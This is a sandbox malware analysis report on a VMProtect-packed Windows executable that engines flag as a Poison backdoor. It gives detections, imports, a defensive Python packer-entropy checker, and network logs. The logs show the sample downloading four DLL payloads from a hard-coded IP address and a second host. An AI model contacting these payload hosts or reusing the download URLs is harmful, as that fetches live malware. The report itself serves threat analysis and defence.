Score: 5.2
Risk level: Medium

SHA-256: db3bf7df2b9b1f4ce2ad0c7eac56bd45b8f6b7991befa66061a00659a276eba2

Filename: 51eb783ad4f81ded5399d497c36bdc9e.exe

Analysis duration: 88s

Last analysed:

File size: 12.4MB
Static detection / dynamic detection: 100%
Detection tags: @B0@AYJEMHNB AI SCORE=86 AIDETECTVM ATTRIBUTE BLACKMOON BSCOPE CONFIDENCE ELDORADO FIK6PQDFNKR7LNEYT6BJRW FLYSTUDIO GENERIC@ML GENERICKD GRAYWARE HACKTOOL HIGH CONFIDENCE HIGHCONFIDENCE ISVQ@5MBONP JJRA MALICIOUS PE MALWARE1 POISON PUPSTUDIO RDML SCORE SWLF TIGGRE UNSAFE WACATAC ZEXAF
Eagle Eye engine
Not detected (no Eagle Eye engine results available)
Static verdict

Anti-virus engines

Engine | Result | Scan date | Engine version
McAfee | (no result) | 20200901 | 6.0.6.653
Alibaba | Backdoor:Win32/Poison.10a65709 | 20190527 | 0.3.0.5
CrowdStrike | win/malicious_confidence_100% (D) | 20190702 | 1.0
Baidu | (no result) | 20190318 | 1.0.0.2
Avast | Win32:Malware-gen | 20200901 | 18.4.3895.0
Tencent | Win32.Backdoor.Poison.Swlf | 20200901 | 1.0.0.1
Kingsoft | (no result) | 20200901 | 2013.8.14.323

Behavioural verdict

Dynamic indicators
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)
suspicious_features: Connection to IP address; suspicious_request: GET http://110.42.9.115:8080/1/gzip.dll
suspicious_features: Connection to IP address; suspicious_request: GET http://110.42.9.115:8080/1/socket.dll
suspicious_features: Connection to IP address; suspicious_request: GET http://110.42.9.115:8080/1/dc.dll
suspicious_features: Connection to IP address; suspicious_request: GET http://110.42.9.115:8080/1/ewe.dll
Performs some HTTP requests (5 events)
request GET http://www.win32test.com:8080/4/pro.txt
request GET http://110.42.9.115:8080/1/gzip.dll
request GET http://110.42.9.115:8080/1/socket.dll
request GET http://110.42.9.115:8080/1/dc.dll
request GET http://110.42.9.115:8080/1/ewe.dll
A process attempted to delay the analysis task. (1 event)
description 51eb783ad4f81ded5399d497c36bdc9e.exe tried to sleep 168 seconds, actually delayed analysis time by 168 seconds
Foreign language identified in PE resource (50 of 59 events; identical entries are listed once with their count)
name TEXTINCLUDE (x3) language LANG_CHINESE offset 0x00cbb040 filetype C source, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000151
name WAVE (x1) language LANG_CHINESE offset 0x00cbb194 filetype RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 22050 Hz sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00001448
name RT_CURSOR (x6) language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134 (the "AmigaOS bitmap font" label is a libmagic false match on the cursor header bytes, not a real font)
name RT_BITMAP (x15) language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_MENU (x2) language LANG_CHINESE offset 0x00ce6e64 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000284
name RT_DIALOG (x12) language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_STRING (x11) language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
An executable file was downloaded by the process 51eb783ad4f81ded5399d497c36bdc9e.exe (4 events)

Each event is a recv() whose first buffer carries an HTTP response with Content-Type: application/x-msdownload and a body that begins with an MZ/PE header. The raw PE bytes captured in the buffers are omitted below; only the HTTP headers and the section names readable from each PE section table are kept. The four Content-Length values are consistent with the Range offsets requested later for gzip.dll (25804 of 32256), socket.dll (881868 of 2204672), dc.dll (up to 73728 of 122880) and ewe.dll (up to 2292940 of 2866176), which maps the four responses onto the four DLL requests in that order; the first field of each Apache ETag is the same size in hex (0x7e00 = 32256 and so on). The fourth payload carries UPX0/UPX1 section names and a "3.03 UPX!" marker, i.e. that file is UPX-packed. Only the first 1284 or 2824 bytes of each transfer appear here; the rest arrived in later reads.

Time: 1620947783.728125 | API: recv | socket: 648 | received: 1284 | Status: success | Return: 1284 | Repeated: 0
buffer:
HTTP/1.0 200 OK
Date: Thu, 13 May 2021 15:18:03 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Last-Modified: Wed, 12 Jun 2019 04:08:53 GMT
ETag: "7e00-58b18924bf867"
Accept-Ranges: bytes
Content-Length: 32256
Connection: close
Content-Type: application/x-msdownload
[MZ header, "This program cannot be run in DOS mode.", PE sections .text .data .rsrc .reloc, import KERNEL32.dll]

Time: 1620947789.713125 | API: recv | socket: 784 | received: 2824 | Status: success | Return: 2824 | Repeated: 0
buffer:
HTTP/1.0 200 OK
Date: Thu, 13 May 2021 15:18:09 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Last-Modified: Sat, 04 Jan 2020 07:11:39 GMT
ETag: "21a400-59b4b2333c0c0"
Accept-Ranges: bytes
Content-Length: 2204672
Connection: close
Content-Type: application/x-msdownload
[MZ header, "This program cannot be run in DOS mode.", PE sections .text .rdata .data .rsrc .reloc, followed by x86 code bytes]

Time: 1620947810.228125 | API: recv | socket: 816 | received: 2824 | Status: success | Return: 2824 | Repeated: 0
buffer:
HTTP/1.0 200 OK
Date: Thu, 13 May 2021 15:18:30 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Last-Modified: Tue, 26 Nov 2019 05:18:20 GMT
ETag: "1e000-598390228459c"
Accept-Ranges: bytes
Content-Length: 122880
Connection: close
Content-Type: application/x-msdownload
[MZ header, "This program cannot be run in DOS mode.", PE sections .text .rdata .data .rsrc .reloc]

Time: 1620947824.072125 | API: recv | socket: 820 | received: 2824 | Status: success | Return: 2824 | Repeated: 0
buffer:
HTTP/1.0 200 OK
Date: Thu, 13 May 2021 15:18:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Last-Modified: Wed, 16 Nov 2016 03:40:44 GMT
ETag: "2bbc00-54162d672c700"
Accept-Ranges: bytes
Content-Length: 2866176
Connection: close
Content-Type: application/x-msdownload
[MZ header, "This program cannot be run in DOS mode.", PE sections UPX0 UPX1 .rsrc, "3.03 UPX!" marker, followed by compressed data]
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.855273766849956 section .vmp0 (virtual_address 0x0031d000, virtual_size 0x0099b570, size_of_data 0x0099c000, entropy 7.855273766849956) description: a section with a high entropy has been found
entropy 0.7728557964184731 description: overall entropy of this PE file is high
The executable is likely packed with VMProtect (1 event)
section .vmp0 description: section name indicates VMProtect
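The two indicators above (a known packer section name and a high-entropy section) and the MZ bodies in the recv() buffers earlier are easy to reproduce without a sandbox. The script below is an added example, not code from the report or the sandbox: it carves the body out of an HTTP response when the body starts with MZ, walks the COFF section table, computes Shannon entropy per section, and applies both heuristics. The HTTP response and the two-section PE image it analyses are constructed inline (a plain-text .text and a ".vmp0" filled with a deterministic SHA-256 chain); the packer name list and the 7.4 bits/byte threshold are assumptions, not values from the report.

```python
import hashlib
import math
import struct
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Assumption: a short list of section names left by common packers.
PACKER_SECTION_NAMES = {".vmp0", ".vmp1", ".vmp2", "UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.4  # assumption: bits/byte above which data looks compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, ~8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def carve_pe_from_http(response: bytes) -> Optional[bytes]:
    """Return the response body if it starts with the MZ signature (what the
    sandbox saw: application/x-msdownload headers, then 'MZ ... DOS mode')."""
    sep = response.find(b"\r\n\r\n")
    if sep < 0:
        return None
    body = response[sep + 4:]
    return body if body[:2] == b"MZ" else None


def pe_sections(image: bytes) -> List[Dict]:
    """Walk the COFF section table and compute the entropy of each section's raw data."""
    if image[:2] != b"MZ" or len(image) < 0x40:
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional                  # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + i * 40)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize,
                         "size_of_data": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def packer_indicators(sections: List[Dict]) -> List[str]:
    """The report's two heuristics: a known packer section name, and a high-entropy
    section that is at least one page long (tiny sections give noisy entropy)."""
    findings = []
    for s in sections:
        if s["name"] in PACKER_SECTION_NAMES:
            findings.append(f"section {s['name']}: name indicates a known packer")
        if s["entropy"] >= HIGH_ENTROPY and s["size_of_data"] >= 0x1000:
            findings.append(f"section {s['name']}: entropy {s['entropy']:.3f} is high")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the report's sample): only the fields the parser reads are filled."""
    text = (b"This program cannot be run in DOS mode." * 100).ljust(0x1000, b"\0")
    vmp, h = bytearray(), b"seed"                 # deterministic high-entropy stand-in for VMProtect code
    while len(vmp) < 0x4000:
        h = hashlib.sha256(h).digest()
        vmp += h
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)             # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections, PE32 optional header
    opt = struct.pack("<H", 0x10B).ljust(0xE0, b"\0")

    def section_header(name, vsize, vaddr, raw_size, raw_ptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, flags)

    headers = (dos + b"PE\0\0" + coff + opt
               + section_header(b".text", 0x1000, 0x1000, 0x1000, 0x200, 0x60000020)
               + section_header(b".vmp0", 0x4000, 0x2000, 0x4000, 0x1200, 0xE0000020)).ljust(0x200, b"\0")
    return headers + text + bytes(vmp)


def build_sample_response(pe: bytes) -> bytes:
    """Constructed response shaped like the recv() buffers in the report."""
    return (b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\nConnection: close\r\n"
            b"Content-Type: application/x-msdownload\r\n\r\n" % len(pe)) + pe


def analyse_response(response: bytes) -> Tuple[List[Dict], List[str]]:
    pe = carve_pe_from_http(response)
    if pe is None:
        return [], []
    sections = pe_sections(pe)
    return sections, packer_indicators(sections)


if __name__ == "__main__":
    secs, hits = analyse_response(build_sample_response(build_sample_pe()))
    for s in secs:
        print(f"{s['name']:<8} raw=0x{s['size_of_data']:06x} entropy={s['entropy']:.3f}")
    print("\n".join(hits))
```

Against the report's numbers, a 0x0099c000-byte section at 7.855 bits/byte would clear the threshold by a wide margin; the minimum-size guard matters for real binaries, where a 16-byte section of random-looking bytes would otherwise trip the entropy rule.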
Network communication
Communicates with host for which no DNS query was performed (2 events)
host 110.42.9.115
host 172.217.24.14
File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
FireEye Generic.mg.51eb783ad4f81ded
Cylance Unsafe
Sangfor Malware
Alibaba Backdoor:Win32/Poison.10a65709
CrowdStrike win/malicious_confidence_100% (D)
Cyren W32/Agent.EW.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky Backdoor.Win32.Poison.jjra
BitDefender Trojan.GenericKD.34353953
MicroWorld-eScan Trojan.GenericKD.34353953
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Poison.Swlf
Ad-Aware Trojan.GenericKD.34353953
Comodo TrojWare.Win32.Agent.ISVQ@5mbonp
Invincea heuristic
SentinelOne DFI - Malicious PE
eGambit HackTool.Generic
Antiy-AVL GrayWare/Win32.FlyStudio.a
Microsoft Trojan:Win32/Wacatac.DD!ml
ZoneAlarm Backdoor.Win32.Poison.jjra
GData Win32.Application.PUPStudio.A
BitDefenderTheta Gen:NN.ZexaF.34196.@B0@ayjEMhnb
ALYac Trojan.GenericKD.34353953
MAX malware (ai score=86)
VBA32 BScope.Trojan.Tiggre
ESET-NOD32 a variant of Win32/Packed.FlyStudio.AC potentially unwanted
Rising Trojan.Generic@ML.92 (RDML:fIk6pqdFNkr7LnEyt6BJrw)
Ikarus PUA.BlackMoon
AVG Win32:Malware-gen
Cybereason malicious.88042b
Visual analysis
Binary image
No binary image: no binary visualisation image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were generated while the sample ran

PE Compile Time

2020-07-31 11:36:06

Imports

Library WINMM.dll:
0x60b794 PlaySoundA
0x60b798 waveOutRestart
0x60b7a4 midiStreamRestart
0x60b7a8 midiStreamClose
0x60b7ac waveOutWrite
0x60b7b0 midiOutReset
0x60b7b4 midiStreamStop
0x60b7b8 waveOutPause
0x60b7bc waveOutReset
0x60b7c0 midiStreamOut
0x60b7c8 midiStreamProperty
0x60b7cc midiStreamOpen
0x60b7d4 waveOutOpen
0x60b7d8 waveOutGetNumDevs
0x60b7dc waveOutClose
Library WS2_32.dll:
0x60b7f4 gethostname
0x60b7f8 inet_addr
0x60b7fc inet_ntoa
0x60b800 WSAStartup
0x60b804 WSACleanup
0x60b808 select
0x60b80c send
0x60b810 closesocket
0x60b814 WSAAsyncSelect
0x60b818 htons
0x60b81c bind
0x60b820 htonl
0x60b824 socket
0x60b828 sendto
0x60b82c recvfrom
0x60b830 ioctlsocket
0x60b834 connect
0x60b838 recv
0x60b83c listen
0x60b840 getpeername
0x60b844 __WSAFDIsSet
0x60b848 ntohs
0x60b84c getsockname
0x60b850 WSAGetLastError
0x60b854 ntohl
0x60b858 accept
0x60b85c gethostbyname
Library MSVFW32.dll:
0x60b44c DrawDibDraw
Library AVIFIL32.dll:
0x60b018 AVIStreamInfoA
0x60b01c AVIStreamGetFrame
Library RASAPI32.dll:
0x60b4a8 RasHangUpA
Library KERNEL32.dll:
0x60b1c8 LoadLibraryExA
0x60b1cc GetSystemDirectoryA
0x60b1d0 SetLastError
0x60b1d8 GetVersion
0x60b1dc Beep
0x60b1e4 IsBadReadPtr
0x60b1ec GetLocalTime
0x60b1f0 MapViewOfFile
0x60b1f4 CreateFileMappingA
0x60b1f8 LocalFree
0x60b1fc UnmapViewOfFile
0x60b200 FormatMessageA
0x60b204 CreateMutexA
0x60b208 SuspendThread
0x60b218 lstrcpynA
0x60b21c DuplicateHandle
0x60b220 FlushFileBuffers
0x60b224 LockFile
0x60b228 UnlockFile
0x60b22c SetEndOfFile
0x60b230 lstrcmpiA
0x60b234 GlobalDeleteAtom
0x60b238 GlobalFindAtomA
0x60b23c GlobalAddAtomA
0x60b240 GlobalGetAtomNameA
0x60b244 lstrcmpA
0x60b248 LocalAlloc
0x60b24c TlsAlloc
0x60b250 GlobalHandle
0x60b254 TlsFree
0x60b258 TlsSetValue
0x60b25c LocalReAlloc
0x60b260 TlsGetValue
0x60b264 GetFileTime
0x60b268 GetCurrentThread
0x60b26c GlobalFlags
0x60b270 SetErrorMode
0x60b274 GetProcessVersion
0x60b278 GetCPInfo
0x60b27c GetOEMCP
0x60b280 GetStartupInfoA
0x60b284 RtlUnwind
0x60b288 GetSystemTime
0x60b28c RaiseException
0x60b290 ExitThread
0x60b294 HeapSize
0x60b298 GetACP
0x60b29c SetStdHandle
0x60b2a0 GetFileType
0x60b2b8 SetHandleCount
0x60b2bc GetStdHandle
0x60b2c4 HeapDestroy
0x60b2c8 HeapCreate
0x60b2cc VirtualFree
0x60b2d4 LCMapStringA
0x60b2d8 LCMapStringW
0x60b2dc VirtualAlloc
0x60b2e0 IsBadWritePtr
0x60b2e8 GetStringTypeA
0x60b2ec GetStringTypeW
0x60b2f0 CompareStringA
0x60b2f4 CompareStringW
0x60b2f8 IsBadCodePtr
0x60b300 OpenProcess
0x60b304 TerminateProcess
0x60b308 GetCurrentProcess
0x60b30c GetFileSize
0x60b310 SetFilePointer
0x60b318 Process32First
0x60b31c Process32Next
0x60b320 TerminateThread
0x60b324 CreateSemaphoreA
0x60b328 ResumeThread
0x60b32c ReleaseSemaphore
0x60b338 GetProfileStringA
0x60b33c WriteFile
0x60b344 CreateFileA
0x60b348 DeviceIoControl
0x60b34c SetEvent
0x60b350 FindResourceA
0x60b354 LoadResource
0x60b358 LockResource
0x60b35c ReadFile
0x60b360 lstrlenW
0x60b364 RemoveDirectoryA
0x60b368 GetModuleFileNameA
0x60b36c WideCharToMultiByte
0x60b370 MultiByteToWideChar
0x60b374 GetCurrentThreadId
0x60b378 ExitProcess
0x60b37c GlobalSize
0x60b380 GlobalFree
0x60b38c lstrcatA
0x60b390 lstrlenA
0x60b394 WinExec
0x60b398 lstrcpyA
0x60b39c FindNextFileA
0x60b3a0 GlobalReAlloc
0x60b3a4 HeapFree
0x60b3a8 HeapReAlloc
0x60b3ac GetProcessHeap
0x60b3b0 HeapAlloc
0x60b3b4 GetUserDefaultLCID
0x60b3b8 GetFullPathNameA
0x60b3bc FreeLibrary
0x60b3c0 LoadLibraryA
0x60b3c4 GetLastError
0x60b3c8 GetVersionExA
0x60b3d8 CreateThread
0x60b3dc CreateEventA
0x60b3e0 Sleep
0x60b3e4 GlobalAlloc
0x60b3e8 GlobalLock
0x60b3ec GlobalUnlock
0x60b3f0 GetTempPathA
0x60b3f4 FindFirstFileA
0x60b3f8 FindClose
0x60b3fc GetFileAttributesA
0x60b400 DeleteFileA
0x60b404 CreateDirectoryA
0x60b410 GetModuleHandleA
0x60b414 GetProcAddress
0x60b418 MulDiv
0x60b41c GetCommandLineA
0x60b420 GetTickCount
0x60b424 CreateProcessA
0x60b428 WaitForSingleObject
0x60b42c CloseHandle
0x60b430 InterlockedExchange
0x60b434 ReleaseMutex
Library USER32.dll:
0x60b4c0 ScrollWindowEx
0x60b4c4 IsDialogMessageA
0x60b4c8 MoveWindow
0x60b4cc SetMenuItemBitmaps
0x60b4d4 LoadIconA
0x60b4d8 TranslateMessage
0x60b4dc DrawFrameControl
0x60b4e0 DrawEdge
0x60b4e4 DrawFocusRect
0x60b4e8 WindowFromPoint
0x60b4ec GetMessageA
0x60b4f0 DispatchMessageA
0x60b4f4 SetRectEmpty
0x60b504 DrawIconEx
0x60b508 CreatePopupMenu
0x60b50c AppendMenuA
0x60b510 ModifyMenuA
0x60b514 CreateMenu
0x60b51c GetDlgCtrlID
0x60b520 GetSubMenu
0x60b524 EnableMenuItem
0x60b528 ClientToScreen
0x60b530 LoadImageA
0x60b538 ShowWindow
0x60b53c IsWindowEnabled
0x60b544 GetKeyState
0x60b54c PostQuitMessage
0x60b550 IsZoomed
0x60b554 GetClassInfoA
0x60b558 DefWindowProcA
0x60b55c GetSystemMenu
0x60b560 DeleteMenu
0x60b564 GetMenu
0x60b568 SetMenu
0x60b56c PeekMessageA
0x60b570 IsIconic
0x60b574 SetFocus
0x60b578 GetActiveWindow
0x60b57c GetWindow
0x60b584 SetWindowRgn
0x60b58c CopyRect
0x60b590 LoadBitmapA
0x60b594 WinHelpA
0x60b598 KillTimer
0x60b59c SetTimer
0x60b5a0 ReleaseCapture
0x60b5a4 GetCapture
0x60b5a8 SetCapture
0x60b5ac GetScrollRange
0x60b5b0 SetScrollRange
0x60b5b4 SetScrollPos
0x60b5b8 SetRect
0x60b5bc InflateRect
0x60b5c0 DestroyIcon
0x60b5c4 PtInRect
0x60b5c8 OffsetRect
0x60b5cc IsWindowVisible
0x60b5d0 EnableWindow
0x60b5d4 RedrawWindow
0x60b5d8 GetWindowLongA
0x60b5dc SetWindowLongA
0x60b5e0 GetSysColor
0x60b5e4 SetActiveWindow
0x60b5e8 SetCursorPos
0x60b5ec LoadCursorA
0x60b5f0 SetCursor
0x60b5f4 GetDC
0x60b5f8 FillRect
0x60b5fc IsRectEmpty
0x60b600 ReleaseDC
0x60b604 IsChild
0x60b608 TrackPopupMenu
0x60b60c DestroyMenu
0x60b610 SetForegroundWindow
0x60b614 GetWindowRect
0x60b618 EqualRect
0x60b61c UpdateWindow
0x60b620 ValidateRect
0x60b624 InvalidateRect
0x60b628 GetClientRect
0x60b62c GetFocus
0x60b630 GetParent
0x60b634 GetTopWindow
0x60b638 PostMessageA
0x60b63c IsWindow
0x60b640 SetParent
0x60b644 DestroyCursor
0x60b648 SendMessageA
0x60b64c SetWindowPos
0x60b650 MessageBoxA
0x60b654 GetCursorPos
0x60b658 GetSystemMetrics
0x60b65c EmptyClipboard
0x60b660 SetClipboardData
0x60b664 OpenClipboard
0x60b668 GetClipboardData
0x60b66c CloseClipboard
0x60b670 wsprintfA
0x60b674 WaitForInputIdle
0x60b678 SendDlgItemMessageA
0x60b67c MapWindowPoints
0x60b680 AdjustWindowRectEx
0x60b684 GetScrollPos
0x60b688 RegisterClassA
0x60b68c CreateWindowExA
0x60b690 GetClassLongA
0x60b694 GetMessageTime
0x60b698 GetLastActivePopup
0x60b6a0 GetWindowPlacement
0x60b6a4 EndDialog
0x60b6ac DestroyWindow
0x60b6b0 EndPaint
0x60b6b4 BeginPaint
0x60b6b8 CharUpperA
0x60b6c0 GetForegroundWindow
0x60b6c4 CheckMenuItem
0x60b6c8 GrayStringA
0x60b6cc DrawTextA
0x60b6d0 TabbedTextOutA
0x60b6d4 WindowFromDC
0x60b6d8 IsMenu
0x60b6dc DrawMenuBar
0x60b6e0 RemovePropA
0x60b6e4 CallWindowProcA
0x60b6e8 GetPropA
0x60b6ec SetPropA
0x60b6f0 GetSysColorBrush
0x60b6f4 GetWindowDC
0x60b6f8 GetMenuItemInfoA
0x60b6fc CreateIconIndirect
0x60b700 GetIconInfo
0x60b704 CopyIcon
0x60b708 LoadStringA
0x60b70c SetWindowTextA
0x60b710 UnhookWindowsHookEx
0x60b714 SetWindowsHookExA
0x60b718 CallNextHookEx
0x60b71c GetMenuItemCount
0x60b720 GetMenuItemRect
0x60b724 GetMenuItemID
0x60b728 GetMenuState
0x60b72c DrawStateA
0x60b730 FrameRect
0x60b734 UnregisterClassA
0x60b738 GetWindowTextA
0x60b73c FindWindowExA
0x60b740 GetDlgItem
0x60b744 FindWindowA
0x60b74c GetClassNameA
0x60b750 GetDesktopWindow
0x60b754 ScreenToClient
0x60b758 GetMessagePos
0x60b75c IntersectRect
0x60b760 GetNextDlgTabItem
Library GDI32.dll:
0x60b050 GetViewportExtEx
0x60b054 ExtSelectClipRgn
0x60b058 RoundRect
0x60b060 GetCurrentObject
0x60b064 DPtoLP
0x60b068 LPtoDP
0x60b06c Rectangle
0x60b070 Ellipse
0x60b074 SetPixelV
0x60b078 CreateCompatibleDC
0x60b07c GetPixel
0x60b080 BitBlt
0x60b084 StartPage
0x60b088 StartDocA
0x60b08c DeleteDC
0x60b090 EndDoc
0x60b094 EndPage
0x60b098 GetObjectA
0x60b09c GetStockObject
0x60b0a0 CreateFontIndirectA
0x60b0a4 CreateSolidBrush
0x60b0a8 FillRgn
0x60b0ac CreateRectRgn
0x60b0b0 CombineRgn
0x60b0b4 PatBlt
0x60b0b8 CreatePen
0x60b0bc SelectObject
0x60b0c0 CreatePatternBrush
0x60b0c4 CreateBitmap
0x60b0c8 CreateBrushIndirect
0x60b0cc CreateDCA
0x60b0d4 GetPolyFillMode
0x60b0d8 GetStretchBltMode
0x60b0dc GetROP2
0x60b0e0 GetBkColor
0x60b0e4 GetBkMode
0x60b0e8 GetTextColor
0x60b0ec CreateRoundRectRgn
0x60b0f0 CreateEllipticRgn
0x60b0f4 PathToRegion
0x60b0f8 EndPath
0x60b0fc BeginPath
0x60b100 GetWindowOrgEx
0x60b104 GetViewportOrgEx
0x60b108 GetWindowExtEx
0x60b10c GetDIBits
0x60b110 RealizePalette
0x60b114 SelectPalette
0x60b118 StretchBlt
0x60b11c CreatePalette
0x60b124 CreateDIBitmap
0x60b128 DeleteObject
0x60b12c SelectClipRgn
0x60b130 CreatePolygonRgn
0x60b134 GetClipRgn
0x60b138 SetStretchBltMode
0x60b13c ExtCreateRegion
0x60b140 SetPixel
0x60b144 CreateDIBSection
0x60b14c SetBkColor
0x60b150 TextOutA
0x60b154 SetBkMode
0x60b158 SetTextColor
0x60b15c SetDIBitsToDevice
0x60b160 FrameRgn
0x60b164 OffsetRgn
0x60b168 GetTextMetricsA
0x60b16c LineTo
0x60b170 MoveToEx
0x60b174 GetClipBox
0x60b178 PtVisible
0x60b17c RectVisible
0x60b180 ExtTextOutA
0x60b184 Escape
0x60b188 SetWindowOrgEx
0x60b18c SaveDC
0x60b190 RestoreDC
0x60b194 CreatePenIndirect
0x60b198 SetPolyFillMode
0x60b19c SetROP2
0x60b1a0 SetMapMode
0x60b1a4 SetViewportOrgEx
0x60b1a8 OffsetViewportOrgEx
0x60b1ac SetViewportExtEx
0x60b1b0 ScaleViewportExtEx
0x60b1b4 SetWindowExtEx
0x60b1b8 ScaleWindowExtEx
0x60b1bc ExcludeClipRect
0x60b1c0 GetDeviceCaps
Library MSIMG32.dll:
0x60b43c TransparentBlt
0x60b440 GradientFill
0x60b444 AlphaBlend
Library WINSPOOL.DRV:
0x60b7e4 OpenPrinterA
0x60b7e8 ClosePrinter
0x60b7ec DocumentPropertiesA
Library comdlg32.dll:
0x60b864 GetFileTitleA
0x60b868 GetSaveFileNameA
0x60b86c GetOpenFileNameA
0x60b870 ChooseFontA
0x60b874 ChooseColorA
Library ADVAPI32.dll:
0x60b000 RegCreateKeyExA
0x60b004 RegQueryValueA
0x60b008 RegSetValueExA
0x60b00c RegOpenKeyExA
0x60b010 RegCloseKey
Library SHELL32.dll:
0x60b4b4 Shell_NotifyIconA
0x60b4b8 ShellExecuteA
Library ole32.dll:
0x60b87c CLSIDFromProgID
0x60b880 OleInitialize
0x60b884 OleUninitialize
0x60b888 CLSIDFromString
0x60b88c CoCreateInstance
0x60b890 OleRun
Library OLEAUT32.dll:
0x60b458 SafeArrayAccessData
0x60b45c SafeArrayGetElement
0x60b460 VariantCopyInd
0x60b464 VariantInit
0x60b468 UnRegisterTypeLib
0x60b46c SysAllocString
0x60b470 SafeArrayDestroy
0x60b474 SafeArrayCreate
0x60b478 VariantCopy
0x60b47c VariantClear
0x60b480 VariantChangeType
0x60b484 SafeArrayGetUBound
0x60b488 SafeArrayGetLBound
0x60b48c SafeArrayGetDim
0x60b490 LoadTypeLib
0x60b494 LHashValOfNameSys
0x60b498 RegisterTypeLib
0x60b49c SafeArrayPutElement
Library COMCTL32.dll:
0x60b024 ImageList_Duplicate
0x60b028 ImageList_Destroy
0x60b02c
0x60b030 ImageList_Draw
0x60b034 _TrackMouseEvent
0x60b038 ImageList_GetIcon
0x60b044 ImageList_Read
Library WININET.dll:
0x60b768 HttpSendRequestA
0x60b76c HttpQueryInfoA
0x60b770 InternetReadFile
0x60b774 InternetConnectA
0x60b778 InternetSetOptionA
0x60b77c InternetOpenA
0x60b780 InternetCloseHandle
0x60b784 HttpOpenRequestA
0x60b788 InternetCrackUrlA

Hosts

No hosts contacted. (The host list is empty even though the TCP table below records 20 connections to 110.42.9.115:8080; that address was contacted directly without a DNS query, as the "Network communication" indicator above notes.)

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 110.42.9.115 8080
192.168.56.101 49179 110.42.9.115 8080
192.168.56.101 49180 110.42.9.115 8080
192.168.56.101 49181 110.42.9.115 8080
192.168.56.101 49182 110.42.9.115 8080
192.168.56.101 49187 110.42.9.115 8080
192.168.56.101 49188 110.42.9.115 8080
192.168.56.101 49189 110.42.9.115 8080
192.168.56.101 49190 110.42.9.115 8080
192.168.56.101 49191 110.42.9.115 8080
192.168.56.101 49204 110.42.9.115 8080
192.168.56.101 49206 110.42.9.115 8080
192.168.56.101 49207 110.42.9.115 8080
192.168.56.101 49208 110.42.9.115 8080
192.168.56.101 49209 110.42.9.115 8080
192.168.56.101 49216 110.42.9.115 8080
192.168.56.101 49217 110.42.9.115 8080
192.168.56.101 49218 110.42.9.115 8080
192.168.56.101 49219 110.42.9.115 8080
192.168.56.101 49220 110.42.9.115 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

